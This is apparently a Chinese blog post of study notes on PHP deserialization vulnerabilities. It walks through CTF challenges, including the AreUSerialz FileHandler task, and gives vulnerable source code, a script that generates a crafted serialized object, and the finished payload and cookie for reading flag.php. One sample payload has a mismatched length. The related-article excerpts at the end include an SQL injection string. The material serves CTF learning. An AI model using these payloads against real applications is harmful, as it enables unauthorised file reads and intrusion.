反序列化漏洞以及一些笔记

已于 2022-04-13 00:29:05 修改
阅读量120 收藏
点赞数
分类专栏: 笔记 文章标签: php
于 2022-04-13 00:28:22 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_47053702/article/details/106805802
版权

**

反序列化漏洞

**

反序列化漏洞##

什么是序列化

将复杂的数据结构转换为可以作为有顺序的字节流发送、或者转化为更扁平的格式以方便接收。

序列化使如下操作更简单:

  • 写入复杂的数据到进程间的内存、文件或者数据库

  • 发送复杂的数据,例如在网络、应用程序的不同组件之间、在API中调用复杂数据

当一个对象被序列化的时候,它的状态也就成了一种“持久态”。即对象属性极其分配的值都被保留下来

什么是反序列化

反序列化是将此字节流恢复为原始对象的完整功能副本的过程,其状态与序列化时的状态完全相同。

之后网站的一些逻辑便可以与这个反序列化的对象进行交互。

许多编程语言都对反序列化有支持。而对象序列化的方法取决于语言的不同:有的转化为2进制,有的转化为不同的字符串格式。

所有的对象属性都储存在序列化的数据流中,为了防止被序列化,可以在类的声明中标记为transient

PHP反序列化漏洞

php序列化与反序列化的关键函数:

  • serialize() 将一个对象转换成字符串 ,即一个序列化函数

  • unserialize() 将字符串还原成一个对象,即一个反序列化函数

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-oP2PJbAn-1649780766172)(V:/Markdown%E6%96%87%E6%A1%A3/images/640.webp)]

简单(无类)情况

简单实例,如下是一串简单的PHP代码,index.php里面包含了flag.php 这个文件


<?php

// 关闭错误报告

error_reporting(0);

include "flag.php";

$key="020202";

$str=$_GET['str'];

if(unserialize($str)==="$key"){

  echo "$flag";

}

show_source(__FILE__); 

//show_source() 函数对文件进行语法高亮显示。

?>

flag.php文件内容如下


<?php

$flag="flag{020202020020}"   

?>

逻辑解释:当通过URL传递参数到str变量中,如果传递的变量反序列化出来与"$key"相同(三个等于号),那么就输出flag.php里面的flag参数内容,所以可以在URL中输入:


http://127.0.0.1/web/serialize/index.php?str=s:6:"22020202";

在不确定是什么形式的序列化字符串,可以去在线工具里尝试


<?php

$key=020202;

echo serialize($key);

?>

// i:8322;

陷阱(无类)情况

下面是一个反序列化漏洞的陷阱CTF题目


<?php

error_reporting(0);

// 隐藏报错内容

include("flag.php");

$cookie=$_COOKIE['Bob'];

if(isset($_GET['hint'])){

  show_source(__FILE__);

}elseif(unserialize($cookie)==="$key"){

	echo "$flag";

}else{

  $key="123456";

}

?>

从代码可以看到,代码获取Bob的cookie内容,然后与key元素作比较,如果反序列化出来内容相同,则输出flag,但是这里面有两个陷阱:

  • 在渗透时,只有输入?hint=的时候才会展示出源代码,而后面的内容则不再执行下去,即hint值存在才会展示源代码,但是一旦展示源代码,后面的内容则不再执行

  • 代码执行顺序的陷阱,key的值只有在else条件下才会被赋值,所以之前与cookie比较的值为空值

根据内容,此题的正确解法修改的cookie内容:


Cookie: Bob=s:0:"";

PHP魔术方法

魔术方法链接


__construct(),类的构造函数



__destruct(),类的析构函数



__call(),在对象中调用一个不可访问方法时调用



__callStatic(),用静态方式中调用一个不可访问方法时调用



__get(),获得一个类的成员变量时调用



__set(),设置一个类的成员变量时调用



__isset(),当对不可访问属性调用isset()empty()时调用



__unset(),当对不可访问属性调用unset()时被调用。



__sleep(),执行serialize()时,先会调用这个函数



__wakeup(),执行unserialize()时,先会调用这个函数



__toString(),类被当成字符串时的回应方法



__invoke(),调用函数的方式调用一个对象时的回应方法



__set_state(),调用var_export()导出类时,此静态方法会被调用。



__clone(),当对象复制完成时调用



__autoload(),尝试加载未定义的类



__debugInfo(),打印所需调试信息



范例

例如下面的代码执行顺序


<?php

error_reporting(0);



class ABC{

  public $test;

  function __construct(){

    $test=1;

    echo "调用了构造函数<br>";

  }

  function __destruct(){

    echo "调用了析构函数<br>";

  }

  function __wakeup(){

    echo "调用了苏醒函数<br>";

  }

}

echo "创建对象a<br>";

$a=new ABC();

echo "序列化<br>";

$a_ser=serialize($a);

echo "反序列化<br>";

$a_unser=unserialize($a_ser);

echo "对象快要死了";



// 创建对象a

// 调用了构造函数

// 序列化

// 反序列化

// 调用了苏醒函数

// 对象快要死了调用了析构函数

// 调用了析构函数

简单(有类)情况

CTFHub-2020网鼎杯AreUSerialz


<?php



include("flag.php");



highlight_file(__FILE__);



class FileHandler {



  protected $op;

  protected $filename;

  protected $content;



  function __construct() {

    $op = "1";

    $filename = "/tmp/tmpfile";

    $content = "Hello World!";

    $this->process();

  }



  public function process() {

    if($this->op == "1") {

      $this->write();

    } else if($this->op == "2") {

      $res = $this->read();

      $this->output($res);

    } else {

      $this->output("Bad Hacker!");

    }

  }



  private function write() {

    if(isset($this->filename) && isset($this->content)) {

      if(strlen((string)$this->content) > 100) {

        $this->output("Too long!");

        die();

      }

      $res = file_put_contents($this->filename, $this->content);

      if($res) $this->output("Successful!");

      else $this->output("Failed!");

    } else {

      $this->output("Failed!");

    }

  }



  private function read() {

    $res = "";

    if(isset($this->filename)) {

      $res = file_get_contents($this->filename);

    }

    return $res;

  }



  private function output($s) {

    echo "[Result]: <br>";

    echo $s;

  }



  function __destruct() {

    if($this->op === "2")

      $this->op = "1";

    $this->content = "";

    $this->process();

  }



}



function is_valid($s) {

  for($i = 0; $i < strlen($s); $i++)

    if(!(ord($s[$i]) >= 32 && ord($s[$i]) <= 125))

      return false;

  return true;

}



if(isset($_GET{'str'})) {



  $str = (string)$_GET['str'];

  if(is_valid($str)) {

    $obj = unserialize($str);

  }



}

代码逻辑

  1. 传入参数str,将其转换为字符串类型,判断是否是ASCII在32到125之间的内容

  2. 反序列化str参数之前,自动调用__wakeup()魔术方法

  3. 调用析构函数__destruct()如果op 参数为 “2”,则自动转换成“1”,将content转换为“”,并调用process()函数

  4. process()函数里判断op的值来决定读写,即读取并输出flag.php中的值

解题方法

  1. 这有一个反序列化的函数unserialize(),就说明需要传入序列化参数

  2. 析构函数中存在过滤,可以利用 =====的差异性进行绕过

  3. 需要熟悉魔术函数的调用顺序,即__wakeup() -> unserialize() -> __destruct()

  4. 执行代码:


<?php



class FileHandler{

  protected $op=' 2'; //绕过检测

  protected $filename="flag.php";

  protected $content="yzp";

}

$flag=new FileHandler();

$flag_1=serialize($flag);

echo $flag_1;

?>

获得序列化字符串


O:11:"FileHandler":3:{s:2:"op";s:2:" 2";s:8:"filename";s:8:"flag.php";s:7:"content";s:3:"yzp";}

最后在URL上传入参数即可

总结:

强弱类型对比是一个绕过PHP检测的方法,== 只比较值而不比较类型,=== 是类型和值都必须相同

此外,魔术方法的调用顺序需要仔细掌握

0
4
7

恶魔小浩哥
关注
专栏目录
Shiro反序列化漏洞利用笔记
文公子的博客
12-11 664
Shiro反序列化漏洞利用笔记 Apache Shiro是一个强大且易用的Java安全框架,执行身份验证、授权、密码和会话管理。目前在Java web应用安全框架中,最热门的产品有Spring Security和Shiro,二者在核心功能上几乎差不多,但Shiro更加轻量级,使用简单、上手更快、学习成本低,所以Shiro的使用量一直高于Spring Security。产品用户量之高,一旦爆发漏洞波及范围相当广泛,研究相关漏洞是很有必要的。 一、Shiro反序列化漏洞 1.1 安全框架 Apache S
ysoserial Java反序列化漏洞利用实践
悦分享
08-04 3392
ysoserial这款工具,堪称为“java反序列利用神器”。
反序列化(Unserialize)题目讲解
qq_49422880的博客
10-05 5758
[RCTF2015]EasySQL 这道题没有什么思路,就是看网上的WP写出,Sql-lib好像也有这道题。这里要使用的一种注入方法叫做二次注入。具体我就不细讲了。 直接放语句上去: admin"||(updatexml(1,concat(0x7e,(select(database()))),1))# 123"||(updatexml(1,concat(0x7e,(select(database()))),1))# ...
CTFshow 菜狗杯 部分wp
weixin_44770698的博客
02-04 2188
ctfshow 菜狗杯 web部分练习(暂时不全)
反序列化漏洞详解
qq_48904485的博客
03-21 3744
一、基础知识 1、序列化 序列化serialize() 序列化说通俗点就是把一个对象变成可以传输的字符串,序列化的目的是方便数据的传输和存储。在PHP应用中,序列化和反序列化一般用做缓存,比如session缓存,cookie等。 常见的序列化格式: 二进制格式 字节数组 json字符串 xml字符串 比如下面是一个对象: class S{ public $test="pikachu"; } $s=new S(); //创建一个对象 serialize($s
PHP 原生类学习与利用
snowlyzz的博客
09-22 1388
php 原生类利用与学习。
php反序列化总结
weixin_44576725的博客
04-08 6734
php反序列化总结 基础知识 序列化 序列化就是将 对象object、字符串string、数组array、变量 转换成具有一定格式的字符串,方便保持稳定的格式在文件中传输,以便还原为原来的内容。 serialize ( mixed $value ) : string serialize() 返回字符串,此字符串包含了表示 value 的字节流,可以存储于任何地方。 example: class Test { public $name = "s1ng"; private $age = 19;
WebGoat JAVA反序列化漏洞分析复现_webgoat反序列化,苦熬一个月
2401_83974064的博客
04-18 342
Python编程学习,学习内容包含:语法、正则、文件、 网络、多线程等常用库,推荐《Python核心编程》,不要看完;在实际的渗透测试过程中,面对复杂多变的网络环境,当常用工具不能满足实际需求的时候,往往需要对现有工具进行扩展,或者编写符合我们要求的工具、自动化脚本,这个时候就需要具备一定的编程能力。该方法代码如下,首先第6行进行传参token,跟到第10行,在进行反序列化对象创建的时候,进行了base64解码并返回到ois变量。这部分内容对零基础的同学来说还比较遥远,就不展开细说了,附上学习路线。
《Web漏洞防护》读书笔记——第10章,反序列化漏洞防护
jexsen的博客
04-09 518
《Web漏洞防护》读书笔记——第10章,反序列化漏洞防护 序列化、反序列化概念 序列化是将对象或数据转换为可以恢复的数据格式的过程。 反序列化是将数据格式恢复回对象的过程。 目前最流量型的数据序列化方式是JSON,以前是XML。 Java的序列化、反序列化概念 Java允许在内存中创建和复用Java对象,只要JVM虚拟机一直处于运行状态,就可以对对象进行调用,因此Java对象的生命周期要短于JVM虚拟机的生命周期。 如果想要持久化的进行对象的存储,需要将对象序列化再进行保存。 使用的时候读取存储的对象的数
【基础篇】第10篇:PHP代码审计笔记--反序列化漏洞1
08-03
本篇文章主要探讨的是PHP中的反序列化漏洞,特别是如何利用`serialize()`和`unserialize()`这两个核心函数进行安全实践。 首先,`serialize()`函数是PHP中用于将变量转换为字符串的工具,这个字符串包含了变量的...
web漏洞之命令注入
小白的博客
04-08 292
漏洞概述 使用脚本语言开发程序过程中,脚本语言开发十分快速、简介,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件)。当应用需要调用一些外部程序时就会用到一些系统命令数。 命令注入与远程代码执行(RCE)不一样。它们的区别是 ,通过RCE,执行的是代码 ;而在命令注入的时 ,执行的是一个(OS)命令。 漏洞成因 将用户输入作为拼接 没有对用户输入过滤 漏洞危害 继承Web服务器
[CTF]PHP反序列化总结
m0_55754984的博客
08-14 807
简介 序列化其实就是将数据转化成一种可逆的数据结构,自然,逆向的过程就叫做反序列化。 在网上找到一个比较形象的例子 比如:现在我们都会在淘宝上买桌子,桌子这种很不规则的东西,该怎么从一个城市运输到另一个城市,这时候一般都会把它拆掉成板子,再装到箱子里面,就可以快递寄出去了,这个过程就类似我们的序列化的过程(把数据转化为可以存储或者传输的形式)。当买家收到货后,就需要自己把这些板子组装成桌子的样子,这个过程就像反序列的过程(转化成当初的数据对象)。 php 将数据序列化和反序列化会用到两个函数 ser
CTF-PHP反序列化
m0_65336233的博客
10-18 1363
CTF-PHP反序列化
ctf新手总结--web做题
Martin-share的博客
10-24 2165
ctf新手总结--web做题
CTF 反序列化入门例题wp
qq_47168481的博客
10-20 2640
最近有再看反序列化,尝试着学一下比赛中的反序列化: 源码: <?php include 'flag.php'; class pkshow { function echo_name() { return "Pk very safe^.^"; } } class acp { protected $cinder; public $neutron; public $nova;
原理+实践掌握(PHP反序列化和Session反序列化)
bylfsj的博客
03-22 1748
<p></p><h2 id="toc-0">前言:</h2> 最近又接触了几道php反序列化的题目,觉得对反序列化的理解又加深了一点,这次就在之前的学习的基础上进行补充。 0x00:PHP序列化 函数 : serialize() 所有php里面的值都可以使用函数serialize()来返回一个包含字节流的字符串来表...
【CTF】buuctf web(三)——PHP序列化与反序列化
m0_52923241的博客
08-04 1826
[极客大挑战 2019]PHP 题目类型:序列化与反序列化 这儿提示备份网站,用dirsearch扫一下后台目录 输入:python dirsearch.py -u http://9b76aef7-3183-4da4-a909-0f95ad5b6607.node4.buuoj.cn -e php 找到www.zip,访问一下 跳出弹窗,点击下载 发现有flag.php目录 <?php $flag = 'Syc{dog_dog_dog_dog}'; ?> 无用信息 查看index.php
一码空传临时网盘PHP源码,支持提取码功能
最新发布
爱酷码的博客
09-11 413
一码空传临时网盘源码V2.0免费授权,该源码提供了一个简单易用的无数据库版临时网盘解决方案。前端采用了layui开发框架,后端使用原生PHP编写,没有引入任何开发框架,保持了代码的简洁和高效。这个程序使用了一个无数据库配置读写类,并借鉴了网络上的config文件读写代码。用户可以通过提取码来提取文件,无需上传文件到服务器。该程序还配备了一个后台管理系统,而且不需要数据库支持。用户上传的文件会保存在upload文件夹中,并按照md5算法进行加密和重命名,确保每次加密结果都不相同。
PHP session反序列化漏洞详解与配置
本文将深入分析PHP的session反序列化漏洞问题,以及相关的配置选项。 首先,我们关注php.ini文件中的四个关键配置项: 1. `session.save_path`:这个选项定义了session数据的存储位置。例如,"D:\xampp\tmp"表示...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值